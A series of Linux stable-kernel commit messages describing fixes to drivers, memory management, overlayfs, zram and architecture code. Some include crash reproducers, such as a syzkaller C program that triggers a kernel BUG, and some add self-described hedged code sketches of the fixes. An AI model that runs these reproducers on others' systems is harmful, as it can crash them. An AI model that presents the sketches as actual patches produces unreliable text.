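              "info: trying to associate to '%.*s' bssid %pM\n",
              (int)req_ssid->ssid_len, req_ssid->ssid,
              bss_desc->mac_address);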
Fixes: 5e6e3a92b9 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e42010d820 upstream.
Per PCIe spec r3.0, sec 2.3.1.1, the Read Completion Boundary (RCB)
determines the naturally aligned address boundaries on which a Read Request
may be serviced with multiple Completions:
- For a Root Complex, RCB is 64 bytes or 128 bytes
This value is reported in the Link Control Register
Note: Bridges and Endpoints may implement a corresponding command bit
which may be set by system software to indicate the RCB value for the
Root Complex, allowing the Bridge/Endpoint to optimize its behavior
when the Root Complex’s RCB is 128 bytes.
- For all other system elements, RCB is 128 bytes
Per sec 7.8.7, if a Root Port only supports a 64-byte RCB, the RCB of all
downstream devices must be clear, indicating an RCB of 64 bytes. If the
Root Port supports a 128-byte RCB, we may optionally set the RCB of
downstream devices so they know they can generate larger Completions.
Some BIOSes supply an _HPX that tells us to set RCB, even though the Root
Port doesn't have RCB set, which may lead to Malformed TLP errors if the
Endpoint generates completions larger than the Root Port can handle.
The IBM x3850 X6 with BIOS version -[A8E120CUS-1.30]- 08/22/2016 supplies
such an _HPX and a Mellanox MT27500 ConnectX-3 device fails to initialize:
mlx4_core 0000:41:00.0: command 0xfff timed out (go bit not cleared)
mlx4_core 0000:41:00.0: device is going to be reset
mlx4_core 0000:41:00.0: Failed to obtain HW semaphore, aborting
mlx4_core 0000:41:00.0: Fail to reset HCA
------------[ cut here ]------------
kernel BUG at drivers/net/ethernet/mellanox/mlx4/catas.c:193!
After 6cd33649fa ("PCI: Add pci_configure_device() during enumeration")
and 7a1562d4f2 ("PCI: Apply _HPX Link Control settings to all devices
with a link"), we apply _HPX settings to *all* devices, not just those
hot-added after boot.
Before 7a1562d4f2, we didn't touch the Mellanox RCB, and the device
worked. After 7a1562d4f2, we set its RCB to 128, and it failed.
Set the RCB to 128 iff the Root Port supports a 128-byte RCB. Otherwise,
set RCB to 64 bytes. This effectively ignores what _HPX tells us about
RCB.
Note that this change only affects _HPX handling. If we have no _HPX, this
does nothing with RCB.
[bhelgaas: changelog, clear RCB if not set for Root Port]
Fixes: 6cd33649fa ("PCI: Add pci_configure_device() during enumeration")
Fixes: 7a1562d4f2 ("PCI: Apply _HPX Link Control settings to all devices with a link")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=187781
Tested-by: Frank Danapfel <fdanapfe@redhat.com>
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e9fb7cc638 upstream.
BYD automatic protocol detection is extremely unreliable and often
triggers false positives on regular mice, Sentelic touchpads, and other
devices. BYD has several documents that have recommended detection
sequence, but they conflict with each other and, as far as I can see, still
would not produce unique enough output to reliably differentiate BYD from
other PS/2 devices.
OEMs sourcing BYD devices also do not do us any favors by not supplying any
reasonable DMI data and instead leaving turds like "To Be Filled By O.E.M."
in place of vendor data, or "System Serial Number" as serial number.
On top of that, BYD is not a truly modern multitouch controller, but rather a
single-touch transitional device that only reports absolute coordinates at
the beginning of finger contact and then reverts to reporting
displacements, and is thus not very precise; the only benefit of using BYD
mode vs the legacy PS/2 mode is possibility of edge scrolling.
Given the above, and the fact that BYD devices are somewhat uncommon, let's
disable automatic detection of BYD devices. Users who know they have BYD
trackpads or want to experiment can attempt to activate BYD protocol via
sysfs:
echo -n "byd" > /sys/bus/serio/devices/serio1/drvctl
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=151691
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=175421
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=120781
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=121281
Fixes: 98ee377144 ("Input: byd - add BYD PS/2 touchpad driver")
Reviewed-by: Pali Rohár <pali.rohar@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4fcfc1619 upstream.
Handling of recursion in d_real() is completely broken. Recursion is only
done in the 'inode != NULL' case. But when opening the file we have
'inode == NULL' hence d_real() will return an overlay dentry. This won't
work since overlayfs doesn't define its own file operations, so all file
ops will fail.
Fix by doing the recursion first and the check against the inode second.
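Conceptually (a simplified sketch, not the exact ovl_d_real() diff):
  /* recurse into the underlying layer first ... */
  real = d_real(ovl_dentry_lower(dentry), inode);
  /* ... and only then compare against the inode we were asked about */
  if (!inode || inode == d_inode(real))
          return real;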
Bash script to reproduce the issue written by Quentin:
- 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - -
tmpdir=$(mktemp -d)
pushd ${tmpdir}
mkdir -p {upper,lower,work}
echo -n 'rocks' > lower/ksplice
mount -t overlay level_zero upper -o lowerdir=lower,upperdir=upper,workdir=work
cat upper/ksplice
tmpdir2=$(mktemp -d)
pushd ${tmpdir2}
mkdir -p {upper,work}
mount -t overlay level_one upper -o lowerdir=${tmpdir}/upper,upperdir=upper,workdir=work
ls -l upper/ksplice
cat upper/ksplice
- 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - -
Reported-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: 2d902671ce ("vfs: merge .d_select_inode() into .d_real()")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 529e71e164 upstream.
The zram hot removal code calls idr_remove() even when zram_remove()
returns an error (typically -EBUSY). This results in a leftover at the
device release, eventually leading to a crash when the module is
reloaded.
As described in the bug report below, the following procedure would
cause an Oops with zram:
- provision three zram devices via modprobe zram num_devices=3
- configure a size for each device
+ echo "1G" > /sys/block/$zram_name/disksize
- mkfs and mount zram0 only
- attempt to hot remove all three devices
+ echo 2 > /sys/class/zram-control/hot_remove
+ echo 1 > /sys/class/zram-control/hot_remove
+ echo 0 > /sys/class/zram-control/hot_remove
- zram0 removal fails with EBUSY, as expected
- unmount zram0
- try zram0 hot remove again
+ echo 0 > /sys/class/zram-control/hot_remove
- fails with ENODEV (unexpected)
- unload zram kernel module
+ completes successfully
- zram0 device node still exists
- attempt to mount /dev/zram0
+ mount command is killed
+ following BUG is encountered
BUG: unable to handle kernel paging request at ffffffffa0002ba0
IP: get_disk+0x16/0x50
Oops: 0000 [#1] SMP
CPU: 0 PID: 252 Comm: mount Not tainted 4.9.0-rc6 #176
Call Trace:
exact_lock+0xc/0x20
kobj_lookup+0xdc/0x160
get_gendisk+0x2f/0x110
__blkdev_get+0x10c/0x3c0
blkdev_get+0x19d/0x2e0
blkdev_open+0x56/0x70
do_dentry_open.isra.19+0x1ff/0x310
vfs_open+0x43/0x60
path_openat+0x2c9/0xf30
do_filp_open+0x79/0xd0
do_sys_open+0x114/0x1e0
SyS_open+0x19/0x20
entry_SYSCALL_64_fastpath+0x13/0x94
This patch adds the proper error check in hot_remove_store() not to call
idr_remove() unconditionally.
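Sketched, the corrected flow in hot_remove_store() becomes:
  zram = idr_find(&zram_index_idr, dev_id);
  if (!zram) {
          ret = -ENODEV;
  } else {
          ret = zram_remove(zram);
          if (!ret)                       /* only drop the idr slot ... */
                  idr_remove(&zram_index_idr, dev_id);  /* ... on success */
  }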
Fixes: 17ec4cd985 ("zram: don't call idr_remove() from zram_remove()")
Bugzilla: https://bugzilla.opensuse.org/show_bug.cgi?id=1010970
Link: http://lkml.kernel.org/r/20161121132140.12683-1-tiwai@suse.de
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Reviewed-by: David Disseldorp <ddiss@suse.de>
Reported-by: David Disseldorp <ddiss@suse.de>
Tested-by: David Disseldorp <ddiss@suse.de>
Acked-by: Minchan Kim <minchan@kernel.org>
Acked-by: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 655548bf62 upstream.
The following program triggers BUG() in munlock_vma_pages_range():
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <sys/mman.h>
int main()
{
mmap((void*)0x20105000ul, 0xc00000ul, 0x2ul, 0x2172ul, -1, 0);
mremap((void*)0x201fd000ul, 0x4000ul, 0xc00000ul, 0x3ul, 0x203f0000ul);
return 0;
}
The test-case constructs the situation when munlock_vma_pages_range()
finds PTE-mapped THP-head in the middle of page table and, by mistake,
skips HPAGE_PMD_NR pages after that.
As result, on the next iteration it hits the middle of PMD-mapped THP
and gets upset seeing mlocked tail page.
The solution is to only skip HPAGE_PMD_NR pages if the THP was mlocked
during munlock_vma_page(). That guarantees that the page is
PMD-mapped, as we never mlock PTE-mapped THPs.
Fixes: e90309c9f7 ("thp: allow mlocked THP again")
Link: http://lkml.kernel.org/r/20161115132703.7s7rrgmwttegcdh4@black.fi.intel.com
Signed-off-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Konstantin Khlebnikov <koct9i@gmail.com>
Cc: Andrey Ryabinin <aryabinin@virtuozzo.com>
Cc: syzkaller <syzkaller@googlegroups.com>
Cc: Andrea Arcangeli <aarcange@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1465d125d upstream.
Commit b46e756f5e ("thp: extract khugepaged from mm/huge_memory.c")
moved code from huge_memory.c to khugepaged.c. Some of this code should
be compiled only when CONFIG_SYSFS is enabled but the condition around
this code was not moved into khugepaged.c.
The result is a compilation error when CONFIG_SYSFS is disabled:
mm/built-in.o: In function `khugepaged_defrag_store': khugepaged.c:(.text+0x2d095): undefined reference to `single_hugepage_flag_store'
mm/built-in.o: In function `khugepaged_defrag_show': khugepaged.c:(.text+0x2d0ab): undefined reference to `single_hugepage_flag_show'
This commit adds the #ifdef CONFIG_SYSFS around the code related to
sysfs.
Link: http://lkml.kernel.org/r/20161114203448.24197-1-jeremy.lefaure@lse.epita.fr
Signed-off-by: Jérémy Lefaure <jeremy.lefaure@lse.epita.fr>
Acked-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3c7c7a2fc8 upstream.
Apparently this is getting in the way of a gcc fix which inhibits the usage
of LP_COUNT as a gpr.
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a8b2ca702 upstream.
Commit 1c3c909303 broke PAE40. The macro pfn_pte(pfn, prot) creates paddr
from pfn, but the page shift was getting truncated to 32 bits since we lost
the proper cast to 64 bits (for PAE40).
Instead of reverting that commit, use a better helper which is 32/64 bits
safe, just like the ARM implementation.
Fixes: 1c3c909303 ("ARC: mm: fix build breakage with STRICT_MM_TYPECHECKS")
Signed-off-by: Yuriy Kolerov <yuriy.kolerov@synopsys.com>
[vgupta: massaged changelog]
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 208da78e8e upstream.
Commit 540eb1eef0 ("scsi: libfc: fix seconds_since_last_reset calculation")
removed the use of 'struct timespec' from fc_get_host_stats(). This broke the
output of 'fcoeadm -s' after kernel 4.8-rc1.
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Fixes: 540eb1eef0 ("scsi: libfc: fix seconds_since_last_reset calculation")
Acked-by: Arnd Bergmann <arnd@arndb.de>
Reviewed-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7630b3a599 upstream.
Older controllers use SCSI target id '0' for the first internal disk. As
the controllers are now placed on the same bus as the internal disks,
this leads to a clash with the SCSI target id of the controller. This patch
checks the SCSI revision, and moves older controllers to bus '3' to be
compatible with older releases and avoid this problem.
[mkp: fixed uninitialized variable]
Fixes: 09371d623c ("hpsa: Change SAS transport devices to bus 0.")
Signed-off-by: Hannes Reinecke <hare@suse.com>
Acked-by: Don Brace <don.brace@microsemi.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0029dcb5b upstream.
There's a typo in ata_gen_passthru_sense(), where the first byte
would be overwritten incorrectly later on.
Reported-by: Charles Machalow <csm10495@gmail.com>
Signed-off-by: Hannes Reinecke <hare@suse.com>
Fixes: 11093cb1ef ("libata-scsi: generate correct ATA pass-through sense")
Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ff723ad0f upstream.
While issuing any ATA passthrough command to firmware the driver will
block the device. But it will unblock the device only if the I/O
completes through the ISR path. If a controller reset occurs before
command completion the device will remain in blocked state.
Make sure we unblock the device following a controller reset if an ATA
passthrough command was queued.
[mkp: clarified patch description]
Fixes: ac6c2a93bd07 ("mpt3sas: Fix for SATA drive in blocked state, after diag reset")
Signed-off-by: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c9b8af1330 upstream.
Andre Noll reported panics after my recent fix (commit 34fad54c25
"net: __skb_flow_dissect() must cap its return value")
After some more headaches, Alexander root caused the problem to
init_default_flow_dissectors() being called too late, in case
a network driver like IGB is not a module and receives a DHCP message
very early.
Fix is to call init_default_flow_dissectors() much earlier,
as it is a core infrastructure and does not depend on another
kernel service.
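In effect (the exact initcall level used is an assumption of this sketch):
  /* run during core initcalls, before any netdev can deliver packets */
  core_initcall(init_default_flow_dissectors);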
Fixes: 06635a35d1 ("flow_dissect: use programable dissector in skb_flow_dissect and friends")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andre Noll <maan@tuebingen.mpg.de>
Diagnosed-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
31e49bfda1 ("mm, oom: protect !costly allocations some more for
!CONFIG_COMPACTION") was an attempt to reduce chances of pre-mature OOM
killer invocation for high order requests. It seemed to work for most
users just fine but it is far from bullet proof and obviously not
sufficient for Marc who has reported pre-mature OOM killer invocations
with 4.8 based kernels. 4.9 with all the compaction improvements seems
to be behaving much better, but that would be too intrusive to backport
to 4.8 stable kernels. Instead this patch simply never declares OOM for
!costly high order requests. We rely on order-0 requests to do that in
case we are really out of memory. Order-0 requests are much more common
and so a risk of a livelock without any way forward is highly unlikely.
Reported-by: Marc MERLIN <marc@merlins.org>
Tested-by: Marc MERLIN <marc@merlins.org>
Signed-off-by: Michal Hocko <mhocko@suse.com>
commit 5499a6b22e upstream.
Since commit 6f3b911d5f ("can: bcm: add support for CAN FD frames") the
CAN broadcast manager supports CAN and CAN FD data frames.
As these data frames are embedded in struct can[fd]_frames which have a
different length the access to the provided array of CAN frames became
dependend of op->cfsiz. By using a struct canfd_frame pointer for the array of
CAN frames the new offset calculation based on op->cfsiz was accidently applied
to CAN FD frame element lengths.
This fix makes the pointer to the arrays of the different CAN frame types a
void pointer so that the offset calculation in bytes accesses the correct CAN
frame elements.
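With a void pointer, the indexing is done explicitly in bytes (sketch):
  /* op->frames is void *; step by the per-op frame size, not sizeof(*cf) */
  struct canfd_frame *cf = (struct canfd_frame *)
                           ((u8 *)op->frames + i * op->cfsiz);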
Reference: http://marc.info/?l=linux-netdev&m=147980658909653
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a1ff57416a upstream.
When configured with CONFIG_PPC_EARLY_DEBUG_OPAL=y the kernel expects
the OPAL entry and base addresses to be passed in r8 and r9
respectively. Currently the wrapper does not attempt to restore these
values before entering the decompressed kernel which causes the kernel
to branch into whatever happens to be in r9 when doing a write to the
OPAL console in early boot.
This patch adds a platform_ops hook that can be used to branch into the
new kernel. The OPAL console driver patches this at runtime so that if
the console is used it will be restored just prior to entering the
kernel.
Fixes: 656ad58ef1 ("powerpc/boot: Add OPAL console to epapr wrappers")
Signed-off-by: Oliver O'Halloran <oohall@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 984d7a1ec6 upstream.
With commit e58e87adc8 ("powerpc/mm: Update _PAGE_KERNEL_RO") we
started using the ppp value 0b110 to map kernel readonly. But that
facility was only added as part of ISA 2.04. For earlier ISA versions the
only supported ppp bit value for readonly mapping is 0b011. (This
implies both user and kernel get mapped using the same ppp bit value for
readonly mapping.).
Update the code such that for earlier architecture version we use ppp
value 0b011 for readonly mapping. We don't differentiate between power5+
and power5 here and apply the new ppp bits only from power6 (ISA 2.05).
This keeps the changes minimal.
This fixes issue with PS3 spu usage reported at
https://lkml.kernel.org/r/rep.1421449714.geoff@infradead.org
Fixes: e58e87adc8 ("powerpc/mm: Update _PAGE_KERNEL_RO")
Tested-by: Geoff Levand <geoff@infradead.org>
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7a43906f5c upstream.
There is a new bit, LPCR_PECE_HVEE (Hypervisor Virtualization Exit
Enable), which controls wakeup from STOP states on Hypervisor
Virtualization Interrupts (which happen to also be all external
interrupts in host or bare metal mode).
It needs to be set or we will miss wakeups.
Fixes: 9baaef0a22 ("powerpc/irq: Add support for HV virtualization interrupts")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
[mpe: Rename it to HVEE to match the name in the ISA]
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4cb19355ea upstream.
The device-dax implementation originally tried to be tricky and allow
private read-only mappings, but in the process allowed writable
MAP_PRIVATE + MAP_NORESERVE mappings. For simplicity and predictability
just fail all private mapping attempts since device-dax memory is
statically allocated and will never support overcommit.
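A simplified sketch of the mmap-time check:
  /* device-dax is statically allocated: refuse MAP_PRIVATE outright */
  if (!(vma->vm_flags & VM_SHARED))
          return -EINVAL;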
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Fixes: dee4107924 ("/dev/dax, core: file operations and dax-mmap")
Reported-by: Pawel Lebioda <pawel.lebioda@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a84fb4b4e upstream.
If the dax_pmem driver is passed a resource that is already busy the
driver probe attempt should fail with a message like the following:
dax_pmem dax0.1: could not reserve region [mem 0x100000000-0x11fffffff]
However, if we do not catch the error we crash for the obvious reason of
accessing memory that is not mapped.
BUG: unable to handle kernel paging request at ffffc90020001000
IP: [<ffffffff81496712>] __memcpy+0x12/0x20
[..]
Call Trace:
[<ffffffff815c4960>] ? nsio_rw_bytes+0x60/0x180
[<ffffffff815c6045>] nd_pfn_validate+0x75/0x320
[<ffffffff815c63a9>] nvdimm_setup_pfn+0xb9/0x5d0
[<ffffffff815c48ef>] ? devm_nsio_enable+0xff/0x110
[<ffffffff815cb699>] dax_pmem_probe+0x59/0x260
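Catching the failure looks roughly like this (assuming the reservation is made
with devm_request_mem_region(); variable names are illustrative):
  if (!devm_request_mem_region(dev, res->start, resource_size(res),
                               dev_name(dev))) {
          dev_warn(dev, "could not reserve region %pR\n", res);
          return -EBUSY;
  }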
Fixes: ab68f26221 ("/dev/dax, pmem: direct access to persistent memory")
Reported-by: Dave Hansen <dave.hansen@linux.intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 22a1e7783e upstream.
The commit 8dfbcc4351 ("[media] xc2028: avoid use after free") tried
to address the reported use-after-free by clearing the reference.
However, it's clearing the wrong pointer; it sets NULL to
priv->ctrl.fname, but it's anyway overwritten by the next line
memcpy(&priv->ctrl, p, sizeof(priv->ctrl)).
OTOH, the actual code accessing the freed string is the strcmp() call
with priv->fname:
  if (!firmware_name[0] && p->fname &&
      priv->fname && strcmp(p->fname, priv->fname))
          free_firmware(priv);
where priv->fname points to the previous file name, and this was
already freed by kfree().
For fixing the bug properly, this patch does the following:
- Keep the copy of firmware file name in only priv->fname,
priv->ctrl.fname isn't changed;
- The allocation is done only when the firmware gets loaded;
- The kfree() is called in free_firmware() commonly
Fixes: commit 8dfbcc4351 ('[media] xc2028: avoid use after free')
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0921d5c9e upstream.
Since commit 87a18a6a56 ("mmc: mmc: Use ->card_busy() to detect busy
cards in __mmc_switch()") the ESDHC driver is broken:
mmc0: Card stuck in programming state! __mmc_switch
mmc0: error -110 whilst initialising MMC card
Since this commit __mmc_switch() uses ->card_busy(), which is
sdhci_card_busy() for the esdhc driver. sdhci_card_busy() uses the
PRESENT_STATE register, specifically the DAT0 signal level bit. But the
ESDHC uses a non-conformant PRESENT_STATE register, thus a read fixup is
required to make the driver work again.
Signed-off-by: Michael Walle <michael@walle.cc>
Fixes: 87a18a6a56 ("mmc: mmc: Use ->card_busy() to detect busy cards in __mmc_switch()")
Acked-by: Yangbo Lu <yangbo.lu@nxp.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5035b230e7 upstream.
This is the second issue I noticed in reviewing the parisc TLB code.
The fic instruction may use either the instruction or data TLB in
flushing the instruction cache. Thus, on machines with a split TLB, we
should also flush the data TLB after setting up the temporary alias
registers.
Although this has no functional impact, I changed the pdtlb and pitlb
instructions to consistently use the index register %r0. These
instructions do not support integer displacements.
Tested on rp3440 and c8000.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c0452fb9fb upstream.
We are still troubled by occasional random segmentation faults and
memory corruption on SMP machines. This causes quite a few
package builds to fail on the Debian buildd machines for parisc. When
gcc-6 failed to build three times in a row, I looked again at the TLB
related code. I found a couple of issues. This is the first.
In general, we need to ensure page table updates and corresponding TLB
purges are atomic. The attached patch fixes an instance in pci-dma.c
where the page table update was not guarded by the TLB lock.
Tested on rp3440 and c8000. So far, no further random segmentation
faults have been observed.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43b1f6abd5 upstream.
Drop the open-coded sched_clock() function and replace it by the provided
GENERIC_SCHED_CLOCK implementation. We have seen quite some hung tasks in the
past, which seem to be fixed by this patch.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ec638db8cb upstream.
Commit 3105f234e0 replaced the module
cpu id table with a cpu feature check, which is logically correct.
But we need the module device table to allow module auto loading.
Fixes: 3105f234 ("thermal/powerclamp: correct cpu support check")
Signed-off-by: Jacob Pan <jacob.jun.pan@linux.intel.com>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b8000586c9 upstream.
Vince Weaver reported that perf_fuzzer + KASAN detects that PEBS event
unwinds sometimes do 'weird' things. In particular, we seemed to be
ending up unwinding from random places on the NMI stack.
While it was somewhat expected that the event record BP,SP would not
match the interrupt BP,SP in that the interrupt is strictly later than
the record event, it was overlooked that it could be on an already
overwritten stack.
Therefore, don't copy the recorded BP,SP over the interrupted BP,SP
when we need stack unwinds.
Note that it's still possible the unwind doesn't fully match the actual
event, as it's entirely possible to have done an (I)RET between record
and interrupt, but on average it should still point in the general
direction of where the event came from. Also, it's the best we can do,
considering.
The particular scenario that triggered the bogus NMI stack unwind was
a PEBS event with very short period, upon enabling the event at the
tail of the PMI handler (FREEZE_ON_PMI is not used), it instantly
triggers a record (while still on the NMI stack) which in turn
triggers the next PMI. This then causes back-to-back NMIs and we'll
try and unwind the stack-frame from the last NMI, which obviously is
now overwritten by our own.
Analyzed-by: Josh Poimboeuf <jpoimboe@redhat.com>
Reported-by: Vince Weaver <vincent.weaver@maine.edu>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@gmail.com>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: davej@codemonkey.org.uk <davej@codemonkey.org.uk>
Cc: dvyukov@google.com <dvyukov@google.com>
Fixes: ca037701a0 ("perf, x86: Add PEBS infrastructure")
Link: http://lkml.kernel.org/r/20161117171731.GV3157@twins.programming.kicks-ass.net
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fc0e81b2be upstream.
On the 80486 DX, it seems that some exceptions may leave garbage in
the high bits of CS. This causes sporadic failures in which
early_fixup_exception() refuses to fix up an exception.
As far as I can tell, this has been buggy for a long time, but the
problem seems to have been exacerbated by commits:
1e02ce4ccc ("x86: Store a per-cpu shadow copy of CR4")
e1bfc11c5a ("x86/init: Fix cr4_init_shadow() on CR4-less machines")
This appears to have been broken for as long as we've had early
exception handling.
[ Note to stable maintainers: This patch is needed all the way back to 3.4,
but it will only apply to 4.6 and up, as it depends on commit:
0e861fbb5b ("x86/head: Move early exception panic code into early_fixup_exception()")
If you want to backport to kernels before 4.6, please don't backport the
prerequisites (there was a big chain of them that rewrote a lot of the
early exception machinery); instead, ask me and I can send you a one-liner
that will apply. ]
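A plausible minimal shape of the fix (hedged sketch), in
early_fixup_exception():
  /* the high word of the pushed CS may be garbage on a 486: compare only
   * the architecturally defined low 16 bits */
  if ((u16)regs->cs != __KERNEL_CS)
          goto fail;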
Reported-by: Matthew Whitehead <tedheadster@gmail.com>
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Fixes: 4c5023a3fa ("x86-32: Handle exception table entries during early boot")
Link: http://lkml.kernel.org/r/cb32c69920e58a1a58e7b5cad975038a69c0ce7d.1479609510.git.luto@kernel.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d55b352b01 upstream.
A correct bugfix introduced a harmless warning that shows up with gcc-7:
fs/nfs/callback.c: In function 'nfs_callback_up':
fs/nfs/callback.c:214:14: error: array subscript is outside array bounds [-Werror=array-bounds]
What happens here is that the 'minorversion == 0' check tells the
compiler that we assume minorversion can be something other than 0,
but when CONFIG_NFS_V4_1 is disabled that would be invalid and
result in an out-of-bounds access.
The added check for IS_ENABLED(CONFIG_NFS_V4_1) tells gcc that this
really can't happen, which makes the code slightly smaller and also
avoids the warning.
The bugfix that introduced the warning is marked for stable backports,
we want this one backported to the same releases.
Fixes: 98b0f80c23 ("NFSv4.x: Fix a refcount leak in nfs_callback_up_net")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3d40658c97 upstream.
After a policy replacement, the task cred may be out of date and need
to be updated. However change_hat is using the stale profiles from
the out of date cred resulting in either: a stale profile being applied
or, incorrect failure when searching for a hat profile as it has been
migrated to the new parent profile.
Fixes: 01e2b670aa (failure to find hat)
Fixes: 898127c34e (stale policy being applied)
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1000287
Signed-off-by: John Johansen <john.johansen@canonical.com>
